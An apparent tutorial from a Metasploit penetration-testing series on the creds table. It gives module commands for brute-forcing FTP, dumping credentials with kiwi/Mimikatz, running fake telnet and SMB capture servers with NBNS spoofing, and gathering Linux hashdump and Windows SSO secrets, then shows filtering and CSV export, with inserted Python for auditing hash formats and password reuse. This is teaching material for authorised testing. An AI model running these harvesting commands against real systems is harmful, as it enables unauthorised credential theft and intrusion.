This article continues the Metasploit for Pentester series. In the previous part, Metasploit for Pentester: Database & Workspace, we covered Workspaces and the Metasploit database service. Here we look at another table inside the Workspace that Penetration Testers can use: Creds.
Table of Contents
· Recap and DB Initialization
· Introduction
· Extracting Creds
    o From Bruteforce
    o From Mimikatz
    o From Telnet
    o From SMB
    o From Hashdump
    o From SSO
· Search Filter
    o By Username
    o By Type
    o By Port
    o By Host
    o By Service
· Adding Credentials
· Exporting Credentials
· Conclusion
Recap and DB Initialization
Without repeating ourselves, a short recap of what we learned in the Workspace article: Metasploit has a PostgreSQL database at its disposal, inside which Penetration Testers can create Workspaces for their own use. A Workspace has sub-sections such as hosts and vulns that hold the hosts enumerated by the user with the help of db_nmap and the Metasploit auxiliary modules. Among those tables we have another one called creds. Before getting into its functionality, let's initialise the database with the following command.
msfdb init
Introduction
After initialising, simply running the creds command shows the table that will hold the data enumerated by the user. It contains the following columns: host holds the primary key, i.e. the IP address of the targeted host; origin records where we were able to grab the creds from; service names the particular service running on the host that made the extraction of the creds possible; public and private are the holders for the public value, which in most cases is the username, and the private value, which as you might have guessed is the password. There are other columns that we will get to later. One worth noting now is JtR Format: it holds the format name that can be passed to the John the Ripper tool to crack the hash.
creds
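The JtR Format column described above is derived from the shape of the private value. The following Python is an added example, not code from the original article or from Metasploit itself: it classifies a set of constructed private values (a cleartext password, an NTLM LM:NT pair built from the well-known hashes of an empty password, and Linux crypt(3) hashes with made-up salt and digest text) into john's --format names, and flags the families a defender should schedule for migration. The format labels and the weak set are this example's own assumptions; the exact string Metasploit stores in the column may differ.

```python
import re

# Constructed sample "private" values of the kinds the creds table holds.
# The NTLM pair is the well-known LM:NT hash of an empty password, used only
# as a harmless placeholder; the crypt(3) digests are filler characters.
SAMPLES = {
    "cleartext": "123",
    "ntlm": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
    "sha512": "$6$saltsalt$" + "A" * 86,
    "sha256": "$5$saltsalt$" + "B" * 43,
    "md5": "$1$saltsalt$" + "C" * 22,
    "bcrypt": "$2b$12$" + "D" * 53,
    "des": "SaltDDDDDDDDD",
}

# Patterns for the hash families most often seen in hashdump/kiwi output.
# Labels are john's --format names (assumption: Metasploit's own column may
# print a different string, e.g. "nt,lm" for an LM:NT pair). The "$N$rounds=..$"
# variants of sha256/sha512crypt are not handled here.
HASH_PATTERNS = [
    ("nt,lm", re.compile(r"^[0-9a-f]{32}:[0-9a-f]{32}$", re.I)),
    ("sha512crypt", re.compile(r"^\$6\$[^$]{1,16}\$[./0-9A-Za-z]{86}$")),
    ("sha256crypt", re.compile(r"^\$5\$[^$]{1,16}\$[./0-9A-Za-z]{43}$")),
    ("md5crypt", re.compile(r"^\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$")),
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$")),
    # Ambiguous on purpose: any 13-char password in this alphabet looks like
    # descrypt, which is why the creds table keeps private_type separately.
    ("descrypt", re.compile(r"^[./0-9A-Za-z]{13}$")),
]

# Families a defender should flag for migration: unsalted (NT is plain MD4,
# LM is weaker still) or legacy constructions with too little stretching.
WEAK_FORMATS = {"nt,lm", "md5crypt", "descrypt"}


def jtr_format(private):
    """Return the john format name for a private value, or None if cleartext."""
    for name, pattern in HASH_PATTERNS:
        if pattern.match(private):
            return name
    return None


def audit_privates(privates):
    """Classify each value as (format or 'cleartext', needs_attention)."""
    report = []
    for value in privates:
        fmt = jtr_format(value)
        if fmt is None:
            report.append(("cleartext", True))  # stored or captured in the clear
        else:
            report.append((fmt, fmt in WEAK_FORMATS))
    return report


if __name__ == "__main__":
    for label, value in SAMPLES.items():
        fmt, weak = audit_privates([value])[0]
        print(f"{label:10} -> {fmt:12} {'ATTENTION' if weak else 'ok'}")
```

The audit treats a cleartext entry as the most urgent finding, ahead of any hash family, because no cracking step is needed before it is usable against the host.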
Extracting Creds: Bruteforce
We mentioned in the Introduction that the creds table is populated with the correct credentials that we enumerate using Metasploit's auxiliary modules. To demonstrate collecting creds from a Bruteforce, we target the FTP service running on a server using the ftp_login auxiliary module. We set the host, a user file with possible usernames and a pass file with possible passwords. After running through the lists of usernames and passwords, the module found the correct credentials: username privs and password 123. After the successful extraction we ran the creds command, and the creds table has its very first entry, as demonstrated in the image below.
use auxiliary/scanner/ftp/ftp_login
set rhosts 192.168.1.40
set user_file /root/users.txt
set pass_file /root/pass.txt
set verbose false
set stop_on_success true
exploit
creds
Extracting Creds: Mimikatz
We are not going to run Mimikatz directly on our target; instead we use the Meterpreter extension called kiwi. We first compromise a Windows machine and gain a meterpreter session on it. After gaining the session, we load the kiwi extension and run the creds_all command to collect all the credentials it can find: passwords and hashes from the compromised machine. We can see that the kiwi extension enumerates the NTLM hashes and some clear-text passwords.
load kiwi
creds_all
Let's run the creds command again to see whether the recently enumerated creds have been populated into the table. We can observe that the clear-text password and the NTLM hashes have been added to the creds table. The host from which we extracted the NTLM hash is the Windows machine with the IP address 192.168.1.21, and the FTP service was running on the machine with the IP address 192.168.1.40.
Extracting Creds: Telnet
Moving on from the FTP service and the NTLM hashes, it's time to extract some telnet credentials with the help of another Metasploit auxiliary module, capture/telnet, which runs a capturing telnet service on our srvhost. We are targeting the machine with the IP address 192.168.1.3, and we can see that the captured credentials are ignited/123. As always, running the creds command confirms that the creds table has been populated with the Telnet credentials.
use auxiliary/server/capture/telnet
set srvhost 192.168.1.9
exploit
creds
Extracting Creds: SMB
Next, we target the Windows machine with the SMB capture server and an NBNS spoofed response to capture NTLM hashes. We use the auxiliary/server/capture/smb and auxiliary/spoof/nbns/nbns_response modules to get the hashes. We provide the host that serves the capture and the path where the john password file should be saved, and we provide the spoof IP address for the NBNS responder. The captured NTLM hashes are shown in the image below.
use auxiliary/server/capture/smb
set srvhost 192.168.1.9
set johnpwfile /root/Desktop
exploit
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.1.9
set interface eth0
exploit
Since we captured the NTLM hashes from the target machine, they automatically populate the creds table. We can check these entries by running the creds command, as shown in the image below.
Extracting Creds: Hashdump
Moving on from NTLM hashes on Windows to password hashes on Linux machines. To enumerate the hashes we use the hashdump post-exploitation module in Metasploit. After exploiting a Linux machine, this module gathers the hashes of all users on the compromised host. We can see from the image below that the extracted hashes have been added to the creds table.
use post/linux/gather/hashdump
set session 3
exploit
It is not always necessary to run the post-exploitation module as demonstrated above. Meterpreter has a command called hashdump that can be run directly from the meterpreter shell. It lists all the extracted hashes, as shown in the image.
hashdump
Going back to the creds table, we can see that it holds the hashes recovered both from the hashdump post-exploitation module and from the hashdump meterpreter command that we just ran.
Extracting Creds: SSO
Next, we target a domain-joined Windows system and try to capture the SSO credentials configured on it, using the post-exploitation module windows/gather/credentials/sso. We can see from the image below that the SSO password for the user Nisha was extracted successfully.
use post/windows/gather/credentials/sso
set session 1
exploit
Let's check whether the SSO credentials for the user Nisha that we just extracted made their way into the creds table. After running the creds command, we can see that it contains the SSO credentials as well.
Search Filter: Username
While working with multiple targets across a dense network of machines, it becomes difficult to identify and search for a particular set of credentials. The creds command has options to filter the data according to your requirement. Let's start with the most basic filter, the username: identifying a set of credentials by username is as standard as lock and key. With the -u option we can filter the creds table on a particular username. In the demonstration below we search for the credentials with the username raj.
creds -u raj
Search Filter: Type
The next search filter we explore is searching by the type of credential. To use it, we need to understand the categorisation that creds applies to different kinds of credentials. When we enumerated the NTLM hashes, they were categorised as the NTLM type. Hence, when we use the -t option with ntlm we get all the captured NTLM hashes, as shown in the image below.
creds -t ntlm
Search Filter: Port
Moving on from the type of credential to the port from which the credential was extracted. We know that credentials are extracted from a particular service, and that service runs on a specific port. To filter the creds table by that port number, use the -p option followed by the port number you want to search on. In the demonstration below, we search for credentials that were extracted from port 23.
creds -p 23
Search Filter: Host
The next search filter we explore is searching by host. These are the hosts from which the credentials originated, i.e. the hosts from which the credentials were extracted. When the -O option is used with the IP address of a host, it lists all the credentials that were extracted from that particular host, as shown in the image below.
creds -O 192.168.1.136
Search Filter: Service
After filtering by hosts, ports, types and usernames, we finally come to the filter that selects credentials by the service they were extracted from. This is similar to the port filter, but as we know, services do not always run on their default ports. Hence, filtering by service name is the more reliable strategy.
creds -s ftp
Adding Credentials
We have introduced several methods of adding credentials to the creds table. If those are not sufficient and you want a particular credential in your database, you have the option to add it manually. It requires the user: tag and the password: tag. In the demonstration below, we add the credentials for the user Pavan.
Exporting Credentials
As we discussed in the previous article about hosts and workspaces, we exported the contents of those tables into a CSV file for reporting and other purposes. The creds command has the same functionality. If you want to export the data from the creds table into a CSV file, use the -o option followed by the file name, as shown below.
creds -o raj.csv
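The search filters (-u, -t, -p, -O, -s) and the CSV export above both operate on the same table, so one added Python example, which is not code from the article or from Metasploit, serves both passages. It parses a constructed export (the column layout is assumed from the article's description of the creds table; the rows reuse the article's lab addresses with invented users and values, and the NTLM pair is the well-known hash of an empty password), reimplements the five filters offline, shows why filtering by service name catches an FTP daemon on a non-default port that a port filter misses, and lists cleartext passwords reused across hosts, which is what a defender reading the report rotates first. The -t aliases are this example's assumption.

```python
import csv
import io
import re

# Column layout assumed from the article's description of the creds table.
CREDS_COLUMNS = ["host", "origin", "service", "public", "private",
                 "realm", "private_type", "JtR Format"]

# Constructed sample export: lab addresses from the article, invented values.
SAMPLE_EXPORT = """\
host,origin,service,public,private,realm,private_type,JtR Format
192.168.1.40,192.168.1.40,21/tcp (ftp),privs,123,,Password,
192.168.1.3,192.168.1.3,23/tcp (telnet),ignited,123,,Password,
192.168.1.21,192.168.1.21,445/tcp (smb),raj,aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0,,NTLM hash,"nt,lm"
192.168.1.136,192.168.1.136,22/tcp (ssh),raj,$6$saltsalt$examplehashvalue,,Nonreplayable hash,sha512crypt
192.168.1.136,192.168.1.136,2121/tcp (ftp),pavan,Secret123,,Password,
"""

# The service column is printed as "<port>/<proto> (<name>)".
SERVICE_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>\w+)(?: \((?P<name>[^)]*)\))?$")

# Assumed aliases for the -t switch, mapped onto the private_type strings used
# in this sample ("ntlm" is the one the article itself uses).
TYPE_ALIASES = {"password": "Password", "ntlm": "NTLM hash",
                "hash": "Nonreplayable hash", "ssh_key": "SSH key"}


def parse_creds_export(text):
    """Load an exported creds CSV and derive a numeric port and service name."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        m = SERVICE_RE.match(row.get("service") or "")
        row["port"] = int(m.group("port")) if m else None
        row["service_name"] = (m.group("name") or "").lower() if m else ""
        rows.append(row)
    return rows


def filter_creds(rows, user=None, ctype=None, port=None, host=None, service=None):
    """Offline counterpart of creds -u / -t / -p / -O / -s on exported rows."""
    wanted_type = TYPE_ALIASES.get(ctype.lower(), ctype) if ctype else None
    out = []
    for r in rows:
        if user is not None and r["public"] != user:
            continue
        if wanted_type is not None and r["private_type"] != wanted_type:
            continue
        if port is not None and r["port"] != port:
            continue
        if host is not None and host not in (r["host"], r["origin"]):
            continue
        if service is not None and r["service_name"] != service.lower():
            continue
        out.append(r)
    return out


def reused_passwords(rows):
    """Cleartext passwords seen on more than one host: first rotation targets."""
    seen = {}
    for r in rows:
        if r["private_type"] == "Password":
            seen.setdefault(r["private"], set()).add((r["host"], r["public"]))
    return {pw: where for pw, where in seen.items()
            if len({h for h, _ in where}) > 1}


def to_csv(rows):
    """Write a (filtered) subset back out with the original export columns."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=CREDS_COLUMNS, extrasaction="ignore",
                       lineterminator="\n")
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    creds = parse_creds_export(SAMPLE_EXPORT)
    # Port 21 misses the ftp daemon on 2121; the service-name filter finds both.
    print(len(filter_creds(creds, port=21)), len(filter_creds(creds, service="ftp")))
    for pw, where in reused_passwords(creds).items():
        print("reused cleartext password on", sorted(where))
    print(to_csv(filter_creds(creds, user="raj")), end="")
```

Because to_csv keeps the original column order, a filtered subset can be handed over or re-imported without further editing, which is the usual end state for the export described above.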
Conclusion
This was a learning experience for us: when we start with penetration testing activities, we tend not to focus on the documentation process or on giving our work a proper structure and backup. With time, and after incidents where the lack of these proved costly, we learned their value. The creds functionality of Metasploit is not a new feature; it has been there for years, yet its use in real-life engagements still seems rare. That inspired us to write this guide, so that more Penetration Testers can use it and benefit from it.